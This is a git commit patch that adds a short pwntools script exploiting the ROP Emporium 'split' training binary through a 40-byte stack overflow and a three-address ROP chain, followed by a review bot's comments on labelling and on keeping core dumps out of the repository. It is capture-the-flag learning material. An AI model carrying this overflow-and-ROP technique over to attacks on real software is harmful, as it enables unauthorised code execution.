From ae586f332c3fa2919fca99b0ff8acf1e339b0061 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Mon, 14 Dec 2020 18:27:06 -0600
Subject: new file: x86_64/ret2win/.gdb_history new file: x86_64/ret2win/core new file: x86_64/ret2win/exploit.py new file: x86_64/split/.gdb_history new file: x86_64/split/core new file: x86_64/split/core.split.25050 new file: x86_64/split/exploit.py new file: x86_64/split/fuckyou new file: x86_64/split/xaa
---
 x86_64/split/exploit.py | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100755 x86_64/split/exploit.py
(limited to 'x86_64/split/exploit.py')
diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py
new file mode 100755
index 0000000..0340b77
--- /dev/null
+++ b/x86_64/split/exploit.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+
+
+context.binary = "./split"
+prog = process('./split')
+payload = b''
+
+for c in range(40): #originally 40
+ payload += b'a'
+
+payload += p64(0x00000000004007c3)
+payload += p64(0x0000000000601060) # usefulString
+payload += p64(0x000000000040074b) # usefulFunction + offset
+
+prog.sendline(payload)
+prog.interactive()
-- cgit v1.2.3
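Review bot: The first address in the chain, `payload += p64(0x00000000004007c3)`, is the only one of the three without a label, while the next two lines name `usefulString` and `usefulFunction`; add a trailing comment naming what that address is in `./split` so the script still reads correctly if the binary is rebuilt, e.g. `payload += p64(0x00000000004007c3)  # TODO(author): label this gadget; verify against ./split`. The padding loop `for c in range(40): payload += b'a'` never uses `c`; the same bytes are produced by `payload = b'a' * 40  # originally 40`, which also makes the offset a single visible constant. A short module docstring stating that this is a training script for the ROP Emporium "split" binary, and that all three constants are specific to that exact build (no PIE, fixed addresses), would help the next reader. Separately, the commit message lists `x86_64/split/core`, `core.split.25050` and `.gdb_history` as new files; core dumps carry the full memory image of the crashed process and are usually kept out of version control (a `.gitignore` entry for `core*`), which is likely worth fixing in a follow-up commit.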